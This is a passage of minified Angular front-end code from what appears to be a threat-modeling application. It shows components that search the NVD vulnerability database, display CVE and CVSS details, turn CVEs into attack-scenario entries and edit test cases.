rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.property-form-field[_ngcontent-%COMP%]{width:300px}']}),t})();function V9e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",9),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),it(8,"input",10),s(9,"\n "),u(),s(10,"\n "),m(11,"mat-form-field",11),s(12,"\n "),m(13,"mat-label"),s(14),oe(15,"translate"),u(),s(16,"\n "),it(17,"input",12),s(18,"\n "),u(),s(19,"\n "),m(20,"mat-form-field",11),s(21,"\n "),m(22,"mat-label"),s(23),oe(24,"translate"),u(),s(25,"\n "),it(26,"input",12),oe(27,"translate"),s(28,"\n "),u(),s(29,"\n "),m(30,"button",4),he("click",function(){const r=be(e).$implicit;return Me(V(2).OpenCVSS(r))}),oe(31,"translate"),s(32,"\n "),m(33,"mat-icon"),s(34,"open_in_new"),u(),s(35,"\n "),u(),s(36,"\n "),it(37,"br"),s(38,"\n "),Mt()}if(2&t){const e=a.$implicit,i=V(2);g(5),za("",re(6,8,"shared.cvss.name.s")," ",e.Version,""),g(3),F("ngModel",e.Score),g(6),ke(re(15,10,"report.CvssVector")),g(3),F("ngModel",i.GetVector(e)),g(6),ke(re(24,12,"properties.Severity")),g(3),F("ngModel",re(27,14,i.GetSeverity(e.Score))),g(4),at("matTooltip",re(31,16,"general.openInNew"))}}function B9e(t,a){if(1&t&&(m(0,"mat-accordion",13),s(1,"\n "),m(2,"mat-expansion-panel",14),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7),u(),s(8,"\n "),m(9,"mat-panel-description"),s(10,"\n "),u(),s(11,"\n "),u(),s(12,"\n "),it(13,"app-cwe-entry",15),s(14,"\n "),u(),s(15,"\n "),u()),2&t){const e=V(2);g(2),F("expanded",!0),g(5),ct("\n CWE-",e.entry.CweID,"\n "),g(6),F("cweID",e.entry.CweID)}}function H9e(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n "),m(2,"mat-form-field",2),s(3,"\n "),m(4,"mat-label"),s(5,"ID"),u(),s(6,"\n "),it(7,"input",3),s(8,"\n "),u(),s(9,"\n "),m(10,"mat-form-field",2),s(11,"\n "),m(12,"mat-label"),s(13),oe(14,"translate"),u(),s(15,"\n "),it(16,"input",3),oe(17,"localDate"),s(18,"\n "),u(),s(19,"\n "),m(20,"mat-form-field",2),s(21,"\n "),m(22,"mat-label"),s(23),oe(24,"translate"),u(),s(25,"\n "),it(26,"input",3),s(27,"\n "),u(),s(28,"\n "),m(29,"button",4),he("click",function(){return be(e),Me(V().OpenCVE())}),oe(30,"translate"),s(31,"\n "),m(32,"mat-icon"),s(33,"open_in_new"),u(),s(34,"\n "),u(),s(35,"\n "),it(36,"br"),s(37,"\n "),ne(38,V9e,39,18,"ng-container",5),s(39,"\n "),m(40,"mat-form-field",6),s(41,"\n "),m(42,"mat-label"),s(43),oe(44,"translate"),u(),s(45,"\n "),it(46,"textarea",7),s(47,"\n "),u(),s(48,"\n "),ne(49,B9e,16,3,"mat-accordion",8),s(50,"\n"),u()}if(2&t){const e=V();g(7),F("value",e.entry.ID),g(6),ke(re(14,10,"shared.cveentry.published")),g(3),F("value",re(17,12,e.entry.Published)),g(7),ke(re(24,14,"properties.Status")),g(3),F("value",e.entry.VulnStatus),g(3),at("matTooltip",re(30,16,"general.openInNew")),g(9),F("ngForOf",e.entry.Scores),g(5),ke(re(44,18,"properties.Description")),g(3),F("value",e.entry.Description),g(3),F("ngIf",e.entry.CweID)}}let I5=(()=>{class t{constructor(){}ngOnInit(){}OpenCVE(){window.open(t.GetURL(this.entry.ID),"_blank")}OpenCVSS(e){window.open(Wm.GetURL(e),"_blank")}GetVector(e){const i=Wm.GetVector(e);return i.substring(i.indexOf("/")+1)}GetSeverity(e){return vn.ToString(Wm.ToThreatSeverity(e))}static GetURL(e){return"https://nvd.nist.gov/vuln/detail/"+e}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["app-cve-entry"]],inputs:{entry:"entry"},decls:1,vars:1,consts:[["style","pointer-events: none;",4,"ngIf"],[2,"pointer-events","none"],["appearance","fill",2,"width","200px","margin-right","5px"],["matInput","","type","text",3,"value"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],[4,"ngFor","ngForOf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","cdkTextareaAutosize","",3,"value"],["style","pointer-events: all;",4,"ngIf"],["appearance","fill",2,"width","200px"],["matInput","","type","number",3,"ngModel"],["appearance","fill",2,"width","200px","margin-left","5px"],["matInput","",3,"ngModel"],[2,"pointer-events","all"],[2,"margin-bottom","10px",3,"expanded"],[3,"cweID"]],template:function(e,i){1&e&&ne(0,H9e,51,20,"div",0),2&e&&F("ngIf",i.entry)}}),t})();function q9e(t,a){1&t&&it(0,"mat-progress-spinner",20),2&t&&F("diameter",20)}function G9e(t,a){1&t&&(m(0,"th",21),s(1),oe(2,"translate"),u()),2&t&&(g(1),ke(re(2,1,"general.Add")))}function j9e(t,a){if(1&t){const e=Ye();m(0,"td",22),s(1,"\n "),m(2,"button",23),he("click",function(n){const c=be(e).$implicit;return V().AddThreat(c),Me(n.stopPropagation())}),oe(3,"translate"),s(4,"\n "),m(5,"mat-icon"),s(6,"flash_on"),u(),s(7,"\n "),u(),s(8,"\n "),u()}2&t&&(g(2),at("matTooltip",re(3,1,"pages.modeling.diagram.addAttackScenario")))}function Q9e(t,a){1&t&&(m(0,"th",24),s(1," ID "),u())}function $9e(t,a){if(1&t&&(m(0,"td",22),s(1),u()),2&t){const e=a.$implicit;g(1),ct(" ",e.ID," ")}}function K9e(t,a){1&t&&(m(0,"th",24),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"shared.cveentry.published")," "))}function X9e(t,a){if(1&t&&(m(0,"td",22),s(1),oe(2,"localDate"),u()),2&t){const e=a.$implicit;g(1),ct(" ",re(2,1,e.Published)," ")}}function Y9e(t,a){1&t&&(m(0,"th",24),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"properties.Status")," "))}function J9e(t,a){if(1&t&&(m(0,"td",22),s(1),u()),2&t){const e=a.$implicit;g(1),ct(" ",e.VulnStatus," ")}}function Z9e(t,a){1&t&&(m(0,"th",24),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct(" ",re(2,1,"report.CvssScore")," "))}function ePe(t,a){if(1&t&&(m(0,"td",22),s(1),u()),2&t){const e=a.$implicit,i=V();g(1),ct(" ",i.GetScore(e)," ")}}function tPe(t,a){1&t&&(m(0,"th",21),s(1,"\xa0"),u())}function iPe(t,a){1&t&&(m(0,"mat-icon"),s(1,"keyboard_arrow_down"),u())}function aPe(t,a){1&t&&(m(0,"mat-icon"),s(1,"keyboard_arrow_up"),u())}function nPe(t,a){if(1&t){const e=Ye();m(0,"td",22),s(1,"\n "),m(2,"button",25),he("click",function(n){const c=be(e).$implicit,d=V();return d.expandedElement=d.expandedElement===c?null:c,Me(n.stopPropagation())}),s(3,"\n "),ne(4,iPe,2,0,"mat-icon",26),s(5,"\n "),ne(6,aPe,2,0,"mat-icon",26),s(7,"\n "),u(),s(8,"\n "),u()}if(2&t){const e=a.$implicit,i=V();g(4),F("ngIf",i.expandedElement!==e),g(2),F("ngIf",i.expandedElement===e)}}function oPe(t,a){1&t&&it(0,"app-cve-entry",29),2&t&&F("entry",V().$implicit)}function rPe(t,a){if(1&t&&(m(0,"td",22),s(1,"\n "),m(2,"div",27),s(3,"\n "),ne(4,oPe,1,1,"app-cve-entry",28),s(5,"\n "),u(),s(6,"\n "),u()),2&t){const e=a.$implicit,i=V();Rt("colspan",i.columnsToDisplayWithExpand.length),g(2),F("@detailExpand",e==i.expandedElement?"expanded":"collapsed"),g(2),F("ngIf",e==i.expandedElement)}}function sPe(t,a){1&t&&it(0,"tr",30)}function cPe(t,a){if(1&t){const e=Ye();m(0,"tr",31),he("click",function(){const r=be(e).$implicit,c=V();return Me(c.expandedElement=c.expandedElement===r?null:r)}),s(1,"\n "),u()}if(2&t){const e=a.$implicit;Ct("entry-expanded-row",V().expandedElement===e)}}function lPe(t,a){1&t&&it(0,"tr",32)}function dPe(t,a){1&t&&(m(0,"tr",33),s(1,"\n "),m(2,"td",34),s(3),oe(4,"translate"),u(),s(5,"\n "),u()),2&t&&(g(3),ke(re(4,1,"shared.cvesearch.noResults")))}const mPe=function(){return["expandedDetail"]},uPe=function(){return[5,10,50,100]};let BG=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=n,this.dataService=r,this.dialog=c,this.locStorage=d,this.http=T,this.SearchString="",this.ExactSearch=!1,this.IsSearching=!1,this.NoSearchResult=!1,this.columnsToDisplay=["add","id","published","vulnStatus","score"],this.columnsToDisplayWithExpand=[...this.columnsToDisplay,"expand"],e&&(this.element=e),i&&(this.viewID=i.Value)}ngOnInit(){const e=this.locStorage.Get(si.CVE_SEARCH_HISTORY);if(null==e)this.searchHistory={},this.locStorage.Set(si.CVE_SEARCH_HISTORY,JSON.stringify(this.searchHistory));else if(this.element&&this.viewID){this.searchHistory=JSON.parse(e);const i=this.searchHistory[this.element.ID+this.viewID];i&&(this.SearchString=i,this.Search())}}Search(){var e;(null===(e=this.SearchString)||void 0===e?void 0:e.length)>0&&!this.IsSearching&&(this.IsSearching=!0,this.dataSource=new zd([]),this.dataSource.paginator=this.paginator,this.http.get("https://services.nvd.nist.gov/rest/json/cves/2.0?keywordSearch="+this.SearchString).subscribe(i=>{var n;if(this.searchHistory[this.element.ID+this.viewID]=this.SearchString,this.locStorage.Set(si.CVE_SEARCH_HISTORY,JSON.stringify(this.searchHistory)),(null===(n=i.vulnerabilities)||void 0===n?void 0:n.length)>0){const r=[];i.vulnerabilities.forEach(c=>{c.cve&&r.push(class U9e{static FromJSON(a){var e,i;let n={ID:a.id,Published:a.published,VulnStatus:a.vulnStatus,Scores:[],Severities:[],Description:"",SourceIdentifier:a.sourceIdentifier,CweID:null};return a.metrics&&Object.keys(a.metrics).length>0&&Object.keys(a.metrics).forEach(r=>{var c;if((null===(c=a.metrics[r])||void 0===c?void 0:c.length)>0){const d=a.metrics[r][0].cvssData;let T={Version:d.version,Vector:d.vectorString};d.baseScore&&(T.Score=Number(d.baseScore)),("3.0"==d.version||"3.1"==d.version)&&(d.attackVector&&(T.AV=d.attackVector[0]),d.attackComplexity&&(T.AC=d.attackComplexity[0]),d.privilegesRequired&&(T.PR=d.privilegesRequired[0]),d.userInteraction&&(T.UI=d.userInteraction[0]),d.scope&&(T.S=d.scope[0]),d.confidentialityImpact&&(T.C=d.confidentialityImpact[0]),d.integrityImpact&&(T.I=d.integrityImpact[0]),d.availabilityImpact&&(T.A=d.availabilityImpact[0])),d.baseSeverity&&n.Severities.push("LOW"==d.baseSeverity?cn.Low:"MEDIUM"==d.baseSeverity?cn.Medium:"HIGH"==d.baseSeverity?cn.High:cn.Critical),n.Scores.push(T)}}),(null===(e=a.descriptions)||void 0===e?void 0:e.length)>0&&(n.Description=a.descriptions.length>1?a.descriptions.find(r=>"en"==r.lang).value:a.descriptions[0].value),(null===(i=a.weaknesses)||void 0===i?void 0:i.length)>0&&a.weaknesses.forEach(r=>{var c;if(null==n.CweID&&(null===(c=r.description)||void 0===c?void 0:c.length)>0){const d=r.description[0].value;isNaN(Number(d.replace("CWE-","")))||(n.CweID=Number(d.replace("CWE-","")))}}),n}}.FromJSON(c.cve)),Object.keys(c).length>1&&console.log("what?",c)}),r.reverse(),this.dataSource=new zd(r),this.dataSource.sort=this.sort,this.dataSource.paginator=this.paginator,this.NoSearchResult=0==r.length}else this.NoSearchResult=!0;this.IsSearching=!1}))}AddThreat(e){if(this.element&&this.viewID){let i=this.dataService.Project.CreateAttackScenario(this.viewID,!1);const n=[];if(e.Scores.length>0){const r=this.dataService.Config.GetThreatCategoryGroups().find(c=>"STRIDE"==c.Name);if(r){const c=JSON.parse(JSON.stringify(e.Scores));c.sort((T,k)=>k.Version.localeCompare(T.Version));const d=c[0].Vector;"N"!=d[d.indexOf("/C:")+3]&&n.push(r.ThreatCategories.find(T=>T.ImpactCats.includes(so.Confidentiality)).ID),"N"!=d[d.indexOf("/I:")+3]&&n.push(r.ThreatCategories.find(T=>T.ImpactCats.includes(so.Integrity)).ID),"N"!=d[d.indexOf("/A:")+3]&&n.push(r.ThreatCategories.find(T=>T.ImpactCats.includes(so.Availability)).ID)}}i.SetMapping("",n,this.element,[this.element],null,null,null,null),i.Description=e.Description,i.Name=e.ID,i.CveEntry=e,e.Severities&&(i.Severity=Math.max(...e.Severities)),e.Scores.some(r=>r.Version.startsWith("3."))&&(i.ScoreCVSS=JSON.parse(JSON.stringify(e.Scores.find(r=>r.Version.startsWith("3."))))),i.IsGenerated=!1,this.dialog.OpenAttackScenarioDialog(i,!0).subscribe(r=>{r||this.dataService.Project.DeleteAttackScenario(i)})}}SearchKeyUp(e){"Enter"==e.key&&this.Search()}GetScore(e){var i;return(null===(i=e.Scores)||void 0===i?void 0:i.length)>0?Math.max(...e.Scores.map(n=>n.Score).filter(n=>null!=n)).toString():""}}return t.\u0275fac=function(e){return new(e||t)(Ee(Np,8),Ee(E2,8),Ee(Oa),Ee(Yi),Ee(Wn),Ee(_r),Ee(op))},t.\u0275cmp=Wt({type:t,selectors:[["app-cve-search"]],viewQuery:function(e,i){if(1&e&&(Mi(al,5),Mi(x8,5)),2&e){let n;Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.paginator=n.first)}},decls:79,vars:15,consts:[["appearance","fill"],["matInput","","type","text",3,"ngModel","ngModelChange","keyup"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["style","display: inline; vertical-align: super; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],["mat-table","","multiTemplateDataRows","","matSort","",3,"dataSource"],["matColumnDef","add","stickyEnd",""],["mat-header-cell","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","id"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["matColumnDef","published"],["matColumnDef","vulnStatus"],["matColumnDef","score"],["matColumnDef","expand"],["matColumnDef","expandedDetail"],["mat-header-row","",4,"matHeaderRowDef"],["mat-row","","class","entry-row",3,"entry-expanded-row","click",4,"matRowDef","matRowDefColumns"],["mat-row","","class","entry-detail-row",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["showFirstLastButtons","",3,"pageSizeOptions"],["mode","indeterminate",2,"display","inline","vertical-align","super","margin-left","5px",3,"diameter"],["mat-header-cell",""],["mat-cell",""],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-cell","","mat-sort-header",""],["mat-icon-button","",3,"click"],[4,"ngIf"],[1,"entry-element-detail"],["style","width: 100%;",3,"entry",4,"ngIf"],[2,"width","100%",3,"entry"],["mat-header-row",""],["mat-row","",1,"entry-row",3,"click"],["mat-row","",1,"entry-detail-row"],[1,"mat-row"],["colspan","5",1,"mat-cell"]],template:function(e,i){1&e&&(m(0,"mat-form-field",0),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"input",1),he("ngModelChange",function(r){return i.SearchString=r})("keyup",function(r){return i.SearchKeyUp(r)}),u(),s(7,"\n "),m(8,"button",2),he("click",function(){return i.Search()}),oe(9,"translate"),s(10,"\n "),m(11,"mat-icon"),s(12,"search"),u(),s(13,"\n "),u(),s(14,"\n"),u(),s(15,"\n"),ne(16,q9e,1,1,"mat-progress-spinner",3),s(17,"\n\n"),s(18,"\n"),m(19,"table",4),s(20,"\n "),bt(21,5),s(22,"\n "),ne(23,G9e,3,3,"th",6),s(24,"\n "),ne(25,j9e,9,3,"td",7),s(26,"\n "),Mt(),s(27,"\n "),bt(28,8),s(29,"\n "),ne(30,Q9e,2,0,"th",9),s(31,"\n "),ne(32,$9e,2,1,"td",7),s(33,"\n "),Mt(),s(34,"\n "),bt(35,10),s(36,"\n "),ne(37,K9e,3,3,"th",9),s(38,"\n "),ne(39,X9e,3,3,"td",7),s(40,"\n "),Mt(),s(41,"\n "),bt(42,11),s(43,"\n "),ne(44,Y9e,3,3,"th",9),s(45,"\n "),ne(46,J9e,2,1,"td",7),s(47,"\n "),Mt(),s(48,"\n "),bt(49,12),s(50,"\n "),ne(51,Z9e,3,3,"th",9),s(52,"\n "),ne(53,ePe,2,1,"td",7),s(54,"\n "),Mt(),s(55,"\n\n "),bt(56,13),s(57,"\n "),ne(58,tPe,2,0,"th",6),s(59,"\n "),ne(60,nPe,9,2,"td",7),s(61,"\n "),Mt(),s(62,"\n\n "),s(63,"\n "),bt(64,14),s(65,"\n "),ne(66,rPe,7,3,"td",7),s(67,"\n "),Mt(),s(68,"\n\n "),ne(69,sPe,1,0,"tr",15),s(70,"\n "),ne(71,cPe,2,2,"tr",16),s(72,"\n "),ne(73,lPe,1,0,"tr",17),s(74,"\n "),ne(75,dPe,6,3,"tr",18),s(76,"\n"),u(),s(77,"\n"),it(78,"mat-paginator",19)),2&e&&(g(3),ke(re(4,9,"shared.cvesearch.Search")),g(3),F("ngModel",i.SearchString),g(2),at("matTooltip",re(9,11,"shared.cvesearch.Search")),g(8),F("ngIf",i.IsSearching),g(3),F("dataSource",i.dataSource),g(50),F("matHeaderRowDef",i.columnsToDisplayWithExpand),g(2),F("matRowDefColumns",i.columnsToDisplayWithExpand),g(2),F("matRowDefColumns",kr(13,mPe)),g(5),F("pageSizeOptions",kr(14,uPe)))},styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}table[_ngcontent-%COMP%]{width:100%}tr.entry-detail-row[_ngcontent-%COMP%]{height:0}.entry-row[_ngcontent-%COMP%] td[_ngcontent-%COMP%]{border-bottom-width:0}.entry-element-detail[_ngcontent-%COMP%]{overflow:hidden;display:flex}"],data:{animation:[nr("detailExpand",[sn("collapsed",zi({height:"0px",minHeight:"0"})),sn("expanded",zi({height:"*"})),gn("expanded <=> collapsed",En("225ms cubic-bezier(0.4, 0.0, 0.2, 1)"))])]}}),t})();const fPe=["nameBox"],pPe=["searchBox"];function _Pe(t,a){if(1&t){const e=Ye();m(0,"button",31),he("click",function(){return be(e),Me(V(2).testCase.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function gPe(t,a){1&t&&(m(0,"mat-hint",32),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct("\n ",re(2,1,"messages.error.numberAlreadyExists"),"\n "))}function CPe(t,a){if(1&t&&(m(0,"mat-option",33),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetTestCaseStateName(e)))}}function yPe(t,a){if(1&t){const e=Ye();m(0,"div",34),s(1,"\n "),m(2,"img",35,36),he("click",function(){const r=be(e).$implicit;return Me(V(2).ViewImage(r))}),u(),s(4,"\n "),m(5,"div",37),s(6,"\n "),m(7,"button",38),he("click",function(){const r=be(e).$implicit;return Me(V(2).DeleteImage(r))}),s(8,"\n "),m(9,"mat-icon"),s(10,"remove"),u(),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),u()}if(2&t){const e=a.$implicit;g(2),F("src",e,nm)}}function bPe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ct("(",e.Value.length,")")}}const HG=function(t){return{groups:t}};function MPe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",39),he("click",function(){const r=be(e).$implicit;return Me(V(2).selectedLinks=r)}),s(1,"\n "),m(2,"mat-icon",40),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",41),s(6),oe(7,"translate"),ne(8,bPe,2,1,"ng-container",0),u(),s(9,"\n "),m(10,"button",42),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()(),s(14,"\n "),u()}if(2&t){const e=a.$implicit;V();const i=Ti(105),n=V();Ct("highlight-light",n.selectedLinks===e&&!n.theme.IsDarkMode)("highlight-dark",n.selectedLinks===e&&n.theme.IsDarkMode),g(6),ct("",re(7,9,e.Key)," "),g(2),F("ngIf",e.Value.length>0),g(2),at("matTooltip",re(11,11,"general.Add")),F("matMenuTriggerFor",i)("matMenuTriggerData",fr(13,HG,n.GetMenuGroups(e)))}}const vPe=function(t){return{items:t}};function APe(t,a){if(1&t&&(m(0,"button",46),s(1,"\n "),m(2,"span"),s(3),u(),s(4,"\n "),u()),2&t){const e=a.$implicit;V(2),F("matMenuTriggerFor",Ti(111))("matMenuTriggerData",fr(3,vPe,e.Value)),g(3),ke(e.Key.Name)}}function TPe(t,a){if(1&t){const e=Ye();s(0,"\n "),m(1,"input",43,44),he("ngModelChange",function(n){return be(e),Me(V(2).searchString=n)})("click",function(){return be(e),Me(V(2).OnSearchBoxClick())}),oe(3,"translate"),u(),s(4,"\n "),ne(5,APe,5,5,"button",45),s(6,"\n ")}if(2&t){const e=a.groups;V();const i=Ti(117),n=V();g(1),at("placeholder",re(3,5,"general.Search")),F("ngModel",n.searchString)("matMenuTriggerFor",i)("matMenuTriggerData",fr(7,HG,e)),g(4),F("ngForOf",e)}}function EPe(t,a){if(1&t){const e=Ye();m(0,"button",48),he("click",function(){const r=be(e).$implicit;return Me(V(3).AddLink(r))}),s(1,"\n "),m(2,"span"),s(3),u(),s(4,"\n "),u()}if(2&t){const e=a.$implicit;g(3),ke(e.Name)}}function DPe(t,a){if(1&t&&(s(0,"\n "),ne(1,EPe,5,1,"button",47),s(2,"\n ")),2&t){const e=a.items;g(1),F("ngForOf",e)}}function xPe(t,a){if(1&t){const e=Ye();m(0,"button",50),he("click",function(){const r=be(e).$implicit;return Me(V(3).AddLink(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function wPe(t,a){if(1&t&&(s(0,"\n "),ne(1,xPe,2,2,"button",49),s(2,"\n ")),2&t){const e=a.groups,i=V(2);g(1),F("ngForOf",i.GetFilteredList(e))}}function IPe(t,a){if(1&t){const e=Ye();m(0,"li"),s(1,"\n "),m(2,"button",53),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnItemClick(r))}),s(3),u(),s(4,"\n "),m(5,"button",17),he("click",function(){const r=be(e).$implicit;return Me(V(3).RemoveLink(r))}),oe(6,"translate"),m(7,"mat-icon"),s(8,"delete"),u()(),s(9,"\n "),u()}if(2&t){const e=a.$implicit,i=V(3);g(3),za("\n ",e.Name," in ",i.GetItemView(e).Name,"\n "),g(2),at("matTooltip",re(6,3,"general.Delete"))}}function RPe(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"div",51),s(3,"\n "),m(4,"ul"),s(5,"\n "),ne(6,IPe,10,5,"li",52),s(7,"\n "),u(),s(8,"\n "),u(),s(9,"\n "),Mt()),2&t){const e=V(2);g(6),F("ngForOf",e.selectedLinks.Value)}}function SPe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",1),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(V().testCase.Name=n)}),u(),s(10,"\n "),ne(11,_Pe,6,3,"button",4),s(12,"\n "),u(),s(13,"\n "),m(14,"mat-form-field",5),s(15,"\n "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(V().testCase.Number=n)}),u(),s(21,"\n "),ne(22,gPe,3,3,"mat-hint",7),s(23,"\n "),u(),s(24,"\n "),it(25,"br"),s(26,"\n "),m(27,"mat-form-field",8),s(28,"\n "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(V().testCase.Status=n)}),oe(34,"translate"),s(35,"\n "),ne(36,CPe,3,4,"mat-option",10),s(37,"\n "),u(),s(38,"\n "),u(),s(39,"\n "),m(40,"button",11),he("click",function(){return be(e),Me(V().AddAttackScenario())}),oe(41,"translate"),m(42,"mat-icon"),s(43,"flash_on"),u()(),s(44,"\n "),it(45,"br"),s(46,"\n "),m(47,"mat-form-field",12),s(48,"\n "),m(49,"mat-label"),s(50),oe(51,"translate"),u(),s(52,"\n "),m(53,"textarea",13),he("ngModelChange",function(n){return be(e),Me(V().testCase.Description=n)}),u(),s(54,"\n "),u(),s(55,"\n "),m(56,"div"),s(57,"\n "),m(58,"mat-form-field",8),s(59,"\n "),m(60,"mat-label"),s(61),oe(62,"translate"),u(),s(63,"\n "),m(64,"input",2),he("ngModelChange",function(n){return be(e),Me(V().testCase.Version=n)}),u(),s(65,"\n "),u(),s(66,"\n "),it(67,"br"),s(68),oe(69,"translate"),it(70,"app-notes",14),s(71),oe(72,"translate"),it(73,"app-notes",15),s(74),oe(75,"translate"),it(76,"app-notes",14),s(77),oe(78,"translate"),it(79,"app-notes",16),s(80),oe(81,"translate"),m(82,"button",17),he("click",function(){return be(e),Me(Ti(88).click())}),oe(83,"translate"),m(84,"mat-icon"),s(85,"add_photo_alternate"),u()(),s(86,"\n "),m(87,"input",18,19),he("change",function(n){return be(e),Me(V().OnFileSelected(n))}),u(),s(89,"\n "),m(90,"div",20),s(91,"\n "),ne(92,yPe,14,1,"div",21),s(93,"\n "),u(),s(94,"\n 